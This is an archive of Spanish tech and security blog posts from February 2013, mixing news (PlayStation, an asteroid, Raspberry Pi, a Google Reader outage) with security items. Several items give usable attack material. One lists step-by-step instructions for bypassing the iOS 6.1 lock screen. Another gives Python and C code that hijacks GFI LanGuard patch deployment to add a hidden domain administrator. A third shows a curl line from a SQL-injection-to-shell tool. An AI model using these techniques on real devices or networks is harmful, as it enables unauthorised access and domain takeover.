miércoles, 27 de febrero de 2013

Otro fallo permite saltarse el código de bloqueo del iPhone (o cualquier iOS 6.1.2)


Recientemente Vulnerability Lab ha descubierto otro bug en iOS 6.1 que permite saltarse el código de bloqueo del iPhone, por lo que cualquiera podría acceder a un teléfono vulnerable y ver las fotos y contactos conectándolo a un PC por USB.

Los pasos para explotar la vulnerabilidad son los siguientes:


1. Conecta el dispositivo a iTunes y al AppStore para asegurarte de que el código de bloqueo está activado

 
2. Pulsa el botón de encendido (arriba|derecha)

 
3. El móvil se endenderá y se mostrará el código de bloqueo

 
4. Ahora pulsa el botón de la llamada de emergencia

 
5. Marca cualquier número de emergencia (por ejemplo 911, 110 y 112)

 
6. Llama al número y cancela la llamada inmediatamente antes de la conexión

 
7. Pulsa de nuevo el botón de encendido y después el botón central del iPhone

 
8. En el siguiente paso presiona el botón de encendido 3 segundos y en el tercer segundo presiona también a la vez el botón central y el botón de llamada de emergencia

 
9. Después de presionar los 3 botones simultáneamente suelta primero el botón central del iPhone y luego el botón encendido

 
10. La pantalla del iPhone se mostrará de color negro (blackscreen)

 
11. Conecta por USB el teléfono al PC y podrás acceder a los archivos directamente sin el PIN de acceso.


Nota: Sin embargo hay una limitación importante: el sistema de ficheros de iOS está cifrado por lo que sólo se podrán obtener los ficheros si se ha accedido antes desde el PC al iPhone.

Por último os dejamos con el PoC y videotutorial correspondiente:



 



jueves, 21 de febrero de 2013

Dmitry Sklyravov y su detención tras hablar en DEFCON 9


Contado por el gran Chema Alonso: 


Hace poco os conté la historia de Michael Lynn y el CISCOGate que acabó con la censura de la documentación en BlackHat, y hoy os quiero contar otro suceso que bien podría haber sido otra microhistoria y que es de tintes similares a la anterior, pero con otro ponente. En este caso tuvo lugar en las conferncias DEFCON. Pero dejadme que os lo cuente tal y como yo me enteré de todos los acontecimientos que os voy a narrar.

La historia comienza con la primera vez que visité las conferencias Troopers en el año 2010, donde acabé sentado en la cena al lado de un ponente de origen ruso que se presentó como Dmitry. No conocía su historia previamente, pero a lo largo de la cena y la sobremesa, a la que asistían en la misma mesa Steve Dispensa y Marsh Ray que explicarían su TLS-Renegotiation bug, me enteré de todos los problemas legales que tuvo tras pasar por

DEFCON 9.
Para aquel año de conferencias, Dmitry Sklyravov, de ElcomSoft, impartió una charla en la DEFCON que tuvo lugar el 16 de Julio de 2001 sobre básicamente cómo quitar el DRM de los e-books comprados en formato PDF, en una charla que se tituló "ebook security - theory and practice" y en la que se presentaba una herramienta llamada Advanced E-Book Processor que puede ser localizada aún en Internet.

Figura 1: Dmitry Sklyravov
Todo parecía normal, hasta que intentó salir de USA de camino a Rusia el 19 de Julio de 2001, donde fue detenido y puesto en prisión por haber violado la DMCA (Digital Millenium Copyright Act) algo que apoyó la Association of American Publishers. Por supuesto se armó una buena, y hubo manifestación hasta en la puerta de Adobe pidiendo la liberación de Dmitry. Este vídeo muestra en un pequeño reportaje estos momentos.




Dmitry fue liberado tras pagar una fianza de 50.000 USD el 6 de Agosto de 2001, pero no pudo abandonar los USA hasta Diciembre de 2001. El juicio no se realizó hasta Diciembre de 2002, donde fue declarado "No Culpable" pero la historia estuvo coleando hasta el 2008 y puedes ver todos los documentos del caso en la EFF. La secuencia de los acontecimientos está recogida en el artículo de este caso en la Wikipedia

.
A día de hoy Dmitry es un reputado speaker en todas las conferencias de hacking del mundo, aunque no en las que se realizan en USA. El caso ya está cerrado, pero jamás olvidará este episodio que le llevó a pasar por la cárcel, pasar 6 meses retenido en USA y andar con problemas legales durante años. Este próximo mes de marzo tendré la suerte de volverle a ver en acción, que además habla justo detrás de mí en la agenda de la Troopers 13.

martes, 19 de febrero de 2013

Libro: “Security Engineering” de Ross Anderson

Una interesante lectura para todos aquellos que decidan dedicar su tiempo libre a la lectura y el conocimiento. Se trata de la segunda edición de “Security Engineering” de Ross Anderson, una obra cuyo propósito es dar una sólida introducción a la ingeniería de seguridad tal como la entendemos en el inicio del siglo XXI, con un repaso increíble a todas las tecnologías subyacentes.

Totalmente recomendable y ¡ahora puedes leer todos los capítulos gratis!
 
 
 Fuente

Shoryuken: simple script en bash para obtener un shell explotando SQLi


Shoryuken es un sencillo script para bash que podemos utilizar para explotar rápidamente una aplicación web con el backend DBMS en la misma máquina, vulnerable a inyecciones SQL y pobremente pésimamente configurada.

La versión actual puede obtener una sesión remota por el puerto 80/HTTP explotando hosts con MSSQL o MySQL que se ejecutan con usuarios con privilegios elevados (system o root), todo ello con una única petición HTTP: el shoryuken (el famoso golpe de Ryu o Ken que significa "puño del dragón" en japonés).


Fácil de usar y bastante indetectable en TEST MODE (1 petición), necesitaremos tener curl instalado:

shoryuken=$(curl -A $agent -s -i "$target$mssqli&$param$mysqli")

Web del proyecto: http://code.google.com/p/shoryuken/

lunes, 18 de febrero de 2013

Hackeada la web de los Premios Goya. Datos publicados.

Anoche tuvieron lugar los Premios Goya 2013 del Cine Español, y al mismo tiempo se publicaba en Internet gran parte de la base de datos de los asistentes a dicha gala, como los de muchos miembros de la Academia de Cine. El hackeo y la publicación de datos venía desde Lulzes y dejaba en AnonPaste una cantidad de datos personales, como nombres, direcciones de correo electrónico y números de teléfono personales que a más de uno va a dar  un quebradero de cabeza.
Figura 1: Parte del volcado de datos personales de los asistentes
Todo tiene pinta de ser un SQLi a un PHP mal codificado, algo que deja a las claras que de nuevo, una gran institución cae en el viejo error de poner en Internet una aplicación web sin haber pasado por una Auditoría de Seguridad de un equipo de hacking ético. No tiene sentido. 
No sé quién daría la orden de publicar la aplicación web sin auditarla externamente, no sé si algún informático dijo en su momento que esto era una locura o no, pero lo cierto es que ahora este fallo tan sencillo de detectar en cualquier test de intrusión va a traer problemas personales a todos los que acaban de perder la posesión de sus datos personales y a la organización detrás de la web.  Tú no lo hagas nunca: ¡AUDITA antes de salir a Internet!


sábado, 16 de febrero de 2013

Google Play regala una canción cada semana en su nueva sección


A veces nos olvidamos, pero Google Play no solo sirve para descargar apps para nuestros dispositivos Android. También es una enorme tienda de música en la que podemos conseguir los últimos éxitos y asociarlos a nuestra cuenta de Google Play Music. Hoy, sin ningún tipo de fuego de artificio ni de gran anuncio, Google Play ha ganado una sección llamada “Canción gratuita de la semana“.


Como seguramente sospecharás, es en esta sección que podremos conseguir un tema de manera completamente gratuita, una estrategia de marketing que seguro que reportará beneficios tanto a la propia Google como a los artistas elegidos, que seguramente verán que los usuarios nos interesamos mas por ellos una vez hemos escuchado algo de su obra.


El primer tema disponible es Hey Ho, del grupo The Lumineers. Para conseguirlo, solo tenemos que iniciar Google Play y meternos en la sección de música. Después de la “compra”, la tendremos disponible en nuestra biblioteca de Google Play Music.


Fuente

Apropósito: ¿Por qué casi todos los autos en Rusia tienen cámaras que graban todo lo que ocurre?

http://www.youtube.com/watch?v=qqDrnR2bWk4
http://www.youtube.com/watch?v=qqDrnR2bWk4

Durante los últimos años se ha masificado enormemente en Rusia el uso de cámaras montadas en el automóvil (más conocidas como DashCams), lo que para el resto del mundo ha significado cientos de minutos de videos por YouTube con accidentes increíblemente sorprendentes por las carreteras rusas.
Gracias a ésto, hemos podido ver videos no sólo de un grave accidente de un avión de pasajeros ocurrido el pasado 29 diciembre de 2012, sino que también de la reciente caída de un meteorito en Rusia.

Pero, ¿por qué ocurre ésto? Bueno, se debe a que es una forma que tienen los rusos de protegerse de todos los líos legales que acarrean los numerosos accidentes de tránsito que transcurren en las muy mal mantenidas carreteras rusas (usualmente debido a los duros inviernos). Sin embargo, esto sólo explica en parte la proliferación de DashCams en la federación rusa.

El problema es la corrupción. Ya sea por los policías de las Patrullas de Carreteras Rusas, quienes te detienen para asegurarte que cometiste una infracción y que debes pagarle un soborno para continuar manejando, por lo que una cámara te protege un poco ya que es un testigo imparcial; como también porque es común que personas se lancen contra automóviles para decir que los atropellaron y así amenazar con demandas judiciales a los choferes.

Además, el crimen organizado ruso lleva años obteniendo millones de dólares realizando fraudes a las aseguradoras, tanto así que hoy en día es casi imposible obtener un seguro contra accidentes que cubra todo tipo de situaciones a un precio razonable. Esto también es debido a los numerosos accidentes donde los causantes arrancan antes de enfrentar las consecuencias de sus acciones.

Para enfrentar el hecho de que las cortes judiciales en Rusia cada vez ignoran más a los testigos presenciales debido a la masificación de las mentiras, fraudes y corrupción, los conductores de automóviles rusos han recurrido en masa a las DashCams, las que en ese país pueden encontrarse desde los US$ 50, y que graban todo sin parar hasta que se llena la memoria SD, para luego borrar el contenido y comenzar a grabar
nuevamente.



Link: Why Russians Are Obsessed With Dash-Cams (Jalopnik)

viernes, 15 de febrero de 2013

De cómo conocí Raspberry Pi y sus innumerables bondades

El otro día, cuando ya ni me acordaba de la última vez que se incrementó mi casillero de años (i++), un buen amigo me hizo un regalo por mi cumpleaños. Como siempre y antes de retirar el envoltorio, intenté adivinar de qué se trataba. Por el tamaño parecía una cajetilla de tabaco, algo que descarté de inmediato porque era algo más alargada y porque hubiese sido cruel y un disparo certero a la voluntad de alguien que está en periodo de abandono de la nicotina.

Sin más retiré el envoltorio y descubrí una pequeña caja rosa, con el logo de una frambuesa y el nombre 'Raspberry Pi'. Supongo que al abrirlo mi amigo buscaba en mí una reacción distinta a la cara de póker que seguro vio en aquel momento. En seguida comprendió. "Tío, ¡es una Raspberry Pi! ¿¡no sabes lo que es!?". Negué con la cabeza, (pues en estos casos conviene ser sincero): "Ni idea macho".

Contemplen mis vergüenzas. Centrado tanto en la seguridad yo sabía que ni de lejos era el súmmum del conocimiento en hardware/gadgets o dijese del seguimiento de la más pura vanguardia tecnológica, pero parece que no saber que era pequeña placa era la mayor ofensa geek del universo conocido, y cuando mi amigo me explicó brevemente que es 'Raspberry Pi' creanme que así lo fue. En seguida comprenderán por qué...


'Raspberry Pi' es un miniordenador de bajo coste menos de 40€ + IVA!) que fue inicialmente ideado para distribuirse en las escuelas y facilitar la enseñanza de la verdadera informática: comprender cómo funciona y programar. 

Tiene el tamaño de una tarjeta de crédito y en su versión B básicamente incluye un procesador ARM a 700 MHz (al que podemos hacerle overclocking hasta 1 GHz sin perder la garantía), GPU capaz de mover video en Full HD y 3D, y 512 MB de RAM. 


A parte de su reducido precio y tamaño, también añade la ventaja de un consumo eléctrico mínimo (700 mA) pudiendo tener encendido el dispositivo de forma ininterrumpida todo el año por un coste aproximado inferior a 5€, o aprovechar que tenemos encendido algún otro equipo para alimentarlo mediante su puerto USB.



Si sumamos a estas características (bajo coste, reducido tamaño y mínimo consumo eléctrico) un rendimiento de hardware más que aceptable, la posibilidad de conectar otros periféricos y dispositivos (incluso Arduino) y una amplia gama de sistemas operativos y software disponible, tenemos que las aplicaciones que se le pueden dar a Raspberry Pi son casi infinitas: control domótico, robótica, mediacenter capaz de reproducir vídeo en alta definición, radio, servidor de ficheros, videojuegos retro, ... echa un vistazo a las fotos de algunos proyectos y en seguida comprobarás su versatilidad. 


Precisamente ahí está el gran éxito de Raspberry Pi: su masiva distribución en colegios (Google donó 15.000 equipos en Reino Unido) pero sobretodo su calado en el gran público por sus prestaciones ajustadas a un precio inmejorable, que ya se ha traducido en cientos de miles de ventas desde su puesta en mercado hace menos de un año. El resultado, una numerosa y entusiasta comunidad que hace auténticas virguerías con este dispositivo.

Y he aquí yo (O-o), habiendo ignorado hasta ahora Raspberry Pi, buscando redención y pensando en las numerosas posibilidades...


De momento, empezaré con lo básico, con reunir todo lo necesario para empezar a trabajar divertirme con ello. Mi pack incluye una tarjeta SD de 32GB modelo Kingston clase 10 (antes de comprarla me aseguré que otros habían certificado ya su funcionamiento), un viejo lector de tarjetas SD-USB para mi portátil, el cargador micro USB de mi Samsung Galaxy S y una cajita oficial del fabricante:
 

En la próxima entrada sobre Raspberry Pi les contaré mis primeros pasitos con la elección e instalación del sistema operativo...



Fuente

jueves, 14 de febrero de 2013

Evasi0n o Victoria: iOS & Android Full Disk Encryption

He de confesar que tengo más gadgets que un bazar, y entre ellos tengo una tablet Samsung Galaxy Note 10.1 con Android, una tablet con Windows 8 y varios iPhone & iPad con iOS. Son con ellos con los que enredo, juego y experimento cosas, procurando mirarme las opciones que traen de seguridad para saber mejor cómo funcionan. Una de ellas, por supuesto, el cifrado de datos del disco duro de la tablet, que es de lo que os quiero hablar hoy.
En el caso de mi tablet con Windows 8 no hay mucho que hablar, ya que se activa Bitlocker y la única forma de atacarlo a día de hoy es mediante alguna herramienta de fuerza bruta o instalado algún bootkit que haga un Cold Boot para engañar al usuario y robar la contraseña, poco más.
En el caso de Android, con la opción de cifrar el teléfono la cosa es similar a Bitlocker, ya que se cifra todo el disco y las claves de descifrado no se liberan hasta que no se ha introducido la clave maestra. Es decir, cuando se quiere encender el terminal es necesario que se conozca e introduzca esa clave o el terminal Android no arranca, lo que obliga de nuevo a pensar en ataques de fuerza bruta contra el algoritmo AES-128 que está utilizando actualmente.

Figura 1: Opción de cifrar todo el teléfono en Android
En el caso de los dispositivos iOS la cosa cambia, pues aunque el disco está cifrado completamente, nada más encender el terminal - ya sea iPhone, iPad o iPod Touchel disco del sistema es descifrado con la clave derivada del UDID, por lo que se abre la posibilidad de lanzar un exploit contra el sistema, hacer un jailbreak y copiar todos los datos.

Figura 2: Arquitectura de cifrado del sistema de ficheros en iOS
Esto, desde que esta semana se liberase Evasi0n para todos los terminales con iOS 6.x deja absolutamente al 100% de los terminales iOS en manos de las herramientas de análisis forenses, pudiéndose copiar todos los datos del disco en cualquier situación, como por ejemplo con las máquinas que tiene la policía en algunos países para clonar los terminales de los sospechosos.

Figura 3: Evasi0n 1.2. Herramienta de jailbreak para dispositivos iOS 6.0 a iOS 6.1
Esto quiere decir que, aunque algunos digan que la seguridad de iOS es irrompible - que no discuto que el algoritmo de cifrado sea bueno - la existencia de un jailbreak y la no posibilidad de poder poner una password maestra para evitar que se liberen las claves de cifrado del disco en arranque tal y como se hace con Bitlocker y en Android, lo hacen casi inservible.
 
 
 
 

Instalar metasploit en iOS 6.1: iPad para profesionales de la seguridad informática

¿Te apasiona la seguridad informática, tienes tu IPad actualizado con IOS 6.1 y ya has hecho Jailbreak con Evasi0n? Pues seguro que te interesa esto... en el siguiente vídeotutorial Japtron nos enseña como instalar Metasploit en unos sencillos pasos:  




Y para facilitarte la tarea, también puedes encontrar los comandos por escrito gracias a m4ku4z: 

COMANDO A USAR :
# Instalamos herramientas basicas
apt-get update
apt-get dist-upgrade
apt-get install wget subversion

# Descargamos las versiones correctas de las gemas de ruby y sus dependencias
wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

# Instalamos los .deb
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

# Borramos todos los .deb
rm -rf *.deb

# Ingresamos a esta ruta /private/var y hacemos el checkout del proyecto de mestaploit.
(tener paciencia ya que es mucha informacion la que se va descargar)
cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3
# Abrimos la carpeta msf3/
cd msf3/

# y finalmente ejecutamos la consola de metasploit
ruby msfconsole

La Fundación Linux consigue la firma de Microsoft para iniciar en sistemas con UEFI segura


Después de mucho tiempo y esfuerzo la Fundación Linux finalmente ha conseguido desarrollar la solución más práctica para que cualquier distribución pueda usar ordenadores con UEFI de inicio seguro, que está siendo incluida en los nuevos PCs con Windows 8. En realidad eso de instalar Linux en ordenadores con la nueva UEFI no es algo totalmente inédito, como ya demostraron Ubuntu y Fedora, porque con Shim es posible usar el sistema operativo de Tux, pero el proceso es bastante complicado para usuarios novatos. Por eso, la noticia de que Microsoft haya proporcionado la firma digital necesaria para que el proceso sea mucho más sencillo es importante. Además, es bueno saber que la fundación permitirá que cualquier distribución use el código.

Por ahora las instrucciones han sido escritas para que los desarrolladores de distribuciones puedan implementar la solución, pero eso sólo quiere decir que pronto estará disponible en tu sabor de Linux favorito.

http://es.engadget.com/2013/02/11/la...ara-iniciar-s/

miércoles, 13 de febrero de 2013

PlayStation "mostrará su futuro el 20 de febrero"






PlayStation le envió a ENTER.CO una invitación para un evento misterioso el próximo 20 de febrero. Tiene el nombre del PlayStation Meeting 2013 y nos causa mucha sorpresa. Si se tomaron la molestia de invitar a medios latinoamericanos a Nueva York es porque se trata de algo grande.

PlayStation acaba de publicar un video para prepararnos y lo que se viene parece ser el PlayStation 4. Y lo poco que sabemos ya no nos permite estar tranquilos. Tenemos que saber qué va a pasar.

En esta página pueden poner su correo electrónico y fecha de nacimiento para mantenerse al tanto de lo que la empresa nos mostrará. Dios mio. Ya llamamos a Sony para saber qué es lo que está pasando, pero no hemos recibido información al respecto. ¿Será que se viene el PlayStation 4? Estaremos muy pendientes para contarles cualquier novedad.

El evento se llevará a cabo 5 días antes del evento Destination PlayStation se lleve a cabo en Arizona, donde a los proveedores les muestran los más grandes y mejores juegos del año que se viene. ¿Les mostrarán el nuevo hardware antes que los juegos? Son demasiadas preguntas.

Fuente

5 datos sobre el asteroide 2012 DA14, que pasará el viernes muy cerca de la Tierra



Es posible que hayas oído hablar de 2012 DA14, un asteroide que este viernes pasará bastante cerca de la Tierra – a 27.700 kilómetros de la superficie en el momento en que estará más cerca. Es el primer objeto que pasa tan cerca de nuestro planeta que se iniciaron las observaciones astronómicas modernas.

¿Qué implica el paso de este asteroide? ¿Hay algún peligro? La NASA se ha dedicado a responder todas las dudas y aquí dejaremos algunos datos importantes para tener en cuenta.

¿Es cerca 27.700 kilómetros? Aunque la distancia está bastante más allá de nuestra atmósfera, el asteroide pasará por parte del espacio que utilizan los satélites artificiales geosíncronos que tenemos dando vuelta allá arriba en la órbita, y que se ubican en un cinturón a 35.800 kilómetros de distancia de la superficie. El momento en que el asteroide esté más cerca, estará a 1/10 de la distancia que existe entre la Tierra y la Luna.

¿Puede chocar con algún satélite? La NASA no lo descarta aunque asegura que las posibilidades son bajas, ya que la mayoría de los satélites orbitan más cerca de la Tierra que los 27.700 kilómetros a los que pasará el asteroide, con unos pocos geosíncronos a 35.800 km.

El diámetro del asteroide es de 45 metros y viaja a 28.100 km/h. Fue descubierto en febrero de 2012 en el Observatorio Astronómico La Sagra, España. El asteroide también orbita el sol, y su próximo acercamiento a la Tierra ocurrirá en 2046, pero no pasará tan cerca como ahora.

¿Puede chocar con la Tierra? La NASA asegura que no: “El camino del asteroide es bien comprendido, así que no hay posibilidad de una colisión”. En caso hipotético de que un asteroide de este tamaño llegar a impactar al planeta algún día, se liberarían 2,5 megatones de energía en la atmósfera, causando devastación en una zona bastante amplia.

¿Se puede ver? El momento en que el asteroide esté lo más cerca de la Tierra, pasará sobre el océano Índico, aunque durante su paso será visible desde Europa, África y Asia. Como no es TAN grande, será necesario un telescopio o al menos unos binoculares para poder observarlo, pero los astrónomos en ese lado del planeta ya están preparados para observarlo y averiguar su composición y la forma en la que gira, entre otras cosas.



Fuente

martes, 12 de febrero de 2013

Un fallo en Google Reader deja frustrados a miles de usuarios en todo el mundo

 


 El popular lector de feeds del buscador, Google Reader, lleva al menos 3 horas "roto". Muestra publicaciones antiguas leídas como no leídas y por mucho que uno actualice sin parar el lector, marcándolas como ya vistas, Reader insite en devolver los elementos antiguos. Miles de usuarios en todo el mundo comentan en Twitter el problema para el que, de momento, Google no ha ofrecido una explicación.

El servicio lleva ya "caído" durante al menos 3 horas. Las nuevas publicaciones entran con retraso en lector de feeds y las ya leídas aparecen como si no hubieran sido marcadas.

Lo que está claro, al menos por los comentarios de los usuarios en Twitter, es que se trata de un fallo global, no solo de algunos países en concreto. Gente en EE.UU., Latinoamérica y Europa se quejan de los problemas de Reader.

También hay cientos de quejas y entradas en los foros de los productos de Google, en los que un ingeniero de la compañía asegura que son conscientes del problema y están investigando la causa.


FUENTE: http://es.gizmodo.com/un-fallo-en-go...e-us-119929953
 

Tejido humano podría ser fabricado por una bioimpresora 3D


 

Nuestros hermanos de Fayerwayer publicaron recientemente un artículo sobre la creación de una prótesis de mano robot con por medio de una impresora 3D. La ciencia no deja de avanzar y ahora el hardware se está aplicando en algo que parecería sacado de una película de ciencia ficción.

Se trata del bioprinting o impresión de tejidos humanos que podría ser un gran salto en la ciencia. Por primera vez, unos científicos lograron construir una impresora 3D capaz de colocar células madre embrionarias sin destruirlas ni hacerles perder su pluripotencia (capacidad a transformarse en cualquier tipo de tejido). Esto abre campo a un gran sueño científico: la regeneración de órganos enteros.

La impresión en 3D permite desde hace algunos años, fabricar objetos apilando delicadamente capas de resina o de plástico. Unos biólogos tuvieron la gran idea de remplazar el plástico por células para lograr crear estructuras orgánicas.

Estos científicos utilizaron este aparato para crear cartílago. El cual funcionó perfectamente luego de ser trasplantado en ratones.


Esta máquina es piloteada por computador. Dispone de 2 “tintas” biológicas: la primera contiene las células madre en un medio de cultivo que les permite nutrirse. La otra tinta contiene únicamente el medio de cultivo.

Gracias a un sistema de aire comprimido controlado por la apertura y cerrado de una micro válvula, las cantidades colocadas son extremadamente precisas. Los científicos pueden colocar únicamente 5 células si es necesario. Gracias a la superposición de capas, las células son agrupadas en grupos esféricos cuya tamaño es perfectamente controlado.

Los científicos de Organovo afirman: “A pesar de los avances, estamos muy lejos todavía de la creación de órganos complejos por medio de impresoras 3D. Sólo hemos logrado tener éxito con tejido de piel y de músculo. ¿Por qué? – Un hígado, un corazón o incluso un riñón requieren de un sistema vascular desarrollado, lo que no podemos por ahora proveer, y esto a pesar de que otros laboratorios están trabajando en la elaboración de vasos sanguíneos artificiales.”

Por el momento, las técnicas de bioprinting están en sus inicios, pero los avances hacen suponer que algún día las bioimpresoras 3D formarán parte esencial de los laboratorios de biología celular.



Fuente

lunes, 11 de febrero de 2013

http://elstrato.com/wp-content/uploads/2012/07/Botnet.jpg 

Las amenazas que se encuentran a día de hoy en internet se actualizan constantemente para camuflarse lo máximo posible entre las necesidades o búsquedas de los usuarios. Eso es lo que sucede en este caso con el malware W32/Rodpicom.A, que si bien no es algo novedoso, se ha ido actualizando con el paso del tiempo para poder seguir afectando a usuarios, como esta vez, que afecta a usuarios de Skype y MSN Messenger.

El malware tiene una gran infraestructura detrás de él, refiriéndonos a la botnet Rodpicom, que actualmente se encuentra formada por decenas de miles de equipos infectados, y aumentando cada día que pasa esta cifra. Tal y como mencionábamos anteriormente, no se trata de ninguna novedad, refiriéndonos a la programación del malware, pero sí es verdad que ha sabido adaptarse muy bien a las necesidades de los usuarios en internet a lo largo de los años, de ahí que aún siga activa y comenzando a crear serios problemas a usuarios de Skype y MSN Messenger, de momento los dos programas hacia los que el malware está dirigido.

Mecanismo de infección y objetivos

W32/Rodpicom.A se encuentra en una página a la que el usuario es llevado utilizando una dirección URL que es enviada, por lo que se sabe, utilizando el correo electrónico. Una vez que el usuario ha caído en el engaño y accede a la dirección URL indicada para “visualizar un contenido”, la página le solicita la instalación de una nueva versión de Adobe Flash para poder llevarse a cabo la visualización del mismo. Sin embargo, esta falsa actualización contiene el malware que será instalado en el equipo del usuario.

Una vez está instalado, el equipo automáticamente pasa a formar parte de la botnet que anteriormemnte indicábamos. Además, es capaz de identificar el idioma con el que está configurado el equipo del usuario para posteriormente comenzar la búsqueda de cuentas de MSN Messenger o Skype activas en el mismo. Es entonces cuando el malware comienza a mandar mensajes a los contactos indicando la visualización de un contenido en una determinada URL ( la misma a la que hacíamos mención  en el párrafo anterior) y así poder infectar a más usuarios.

Algunas cifras relacionadas con W32/Rodpicom.A

Lleva activo desde el año 2007 y desde entonces ha conseguido infectar a más de un millón de usuarios. Durante esta nueva etapa, los usuarios afectados ascienden a más de 80.000 y es probable que durante las próximas semanas aún siga aumentando hasta superar la barrera de los 100.000 .
 

Fuente | The Hacker News

LEIDO EN :http://www.redeszone.net/2013/02/11/w32rodpicom-a-la-nueva-amenaza-para-skype-y-msn-messenger/
 
http://foro.elhacker.net/noticias/w32rodpicoma_la_nueva_amenaza_para_skype_y_msn_messenger-t382936.0.html

¿Cambiarías tu Iphone 5? Samsung Galaxy S IV sería lanzado en marzo





 

Según el portal espcializado Sammobile, el lanzamiento del Galaxy S IV se produciría en el mes de marzo, más concretamente el viernes 15.

Más aún, en las últimas horas, ha corrido el rumor que el lugar elegido sería Moscú, Rusia, en el marco del lanzamiento de los juegos olímpicos de inviernos Sochi 2014, evento del que Samsung es patrocinante y lo que le permitiría un año completo con fuertes campañas, similar a lo que ocurrió con Londres 2012.

El Galaxy S IV será una bestia a nivel de hardware y tendrá lo mejor que la tecnología puede darle. Aparte de una pantalla Super AMOLED con resolución Full HD, bajo la carcasa del dispositivo podremos encontrar un procesador Exynos 5 Octa de 8 núcleos, un poderoso GPU Mali-T658 de 8 núcleos también y 2GB de RAM. Para mejorar las cosas, el sistema operativo que usará el S IV será el nuevo Android 4.2.1 y disponible en colores negro y blanco.



FUENTE

domingo, 10 de febrero de 2013

Escalado de privilegios mediante GFI LanGuard 2012

GFI LanGuard 2012 (http://www.gfi.com/network-security-vulnerability-scanner) es la competencia de Microsoft SCCM, una suite para inventariado, análisis básico de vulnerabilidades y distribución de software en red.

Existe una característica llamada 'auto remediation' que automáticamente copia y ejecuta las actualizaciones aprobadas por el administrador en los equipos de la red. El parche de software se instalará y el usuario lo único que verá es un aviso para reiniciar su máquina. Normalmente la mayoría de los administradores cometen el error de configurar una cuenta con privilegios de administrador de dominio para facilitar la distribución de estas actualizaciones:

 


El otro problema es que no hay ningún control de integridad de los ficheros copiados antes de ser ejecutados... Si tienes la mente "sucia" ya te habrás dado cuenta que esta técnica va de eso: antes de que se ejecute un parche sustituirlo por otro fichero con un payload malicioso.

Lo único que necesitamos es levantar un listener en nuestra máquina "trampa" en el dominio que va a esperar pacientemente a que GFI LanGuard 2012 le lance una actualización. Este listener va a controlar el contenido del directorio 'C:\Windows\Patches' para que, una vez que vea que hay dos archivos en el directorio (uno siendo escrito y otro ya escrito y por tanto desbloqueado), sustituya el archivo desbloqueado con el archivo con el payload malicioso. Eso sí, dado que los parches se almacenan en el directorio 'C:\Windows\Patches' necesitaremos privilegios de administrador local en el equipo con el listener:


listener.py
 
'''
Created on Dec 21, 2012
@author: Essential Exploit Labs
'''

import os, shutil
path
="C:\\Windows\\Patches\\"
payload
="payload.exe"
hook
=0
files
= []
 
dirList
=os.listdir(path)
for fname in dirList:
    fileToDelete
= path
    fileToDelete
+= fname
    os
.remove(fileToDelete)
fname
= None
 
while hook==0:
    dirList
= None
    dirList
=os.listdir(path)
   
for fname in dirList:
       
if fname.endswith(".exe"):
           
if fname not in (files):
                files
.append(fname)
   
if len(files) > 1:
       
print "We got the Files "
       
print files[0]
       
print "and "
       
print files[1]
       
print "Time to launch payload!"
        hook
=1
 
fReplace
= path
fReplace
+= files[0]
shutil
.copy(payload, fReplace)
 
Si tiene éxito, el payload será tan sencillo como efectivo y devastador, como por ejemplo, aprovechar los privilegios de administración de dominio para añadir otro administrador de dominio para nosotros }:)

prueba.c


// payload.cpp 
// Essential Exploit Labs

#include "stdafx.h"
#include <Windows.h>

void exploit()
{
system
("net user admlnlstrator MyPassw0rd /add /domain");
system
("net group \"Domain Admins\" admlnlstrator /add /domain");
}

int _tmain(int argc, _TCHAR* argv[])
{
exploit
();
return 0;
}
 
 
 
Fuente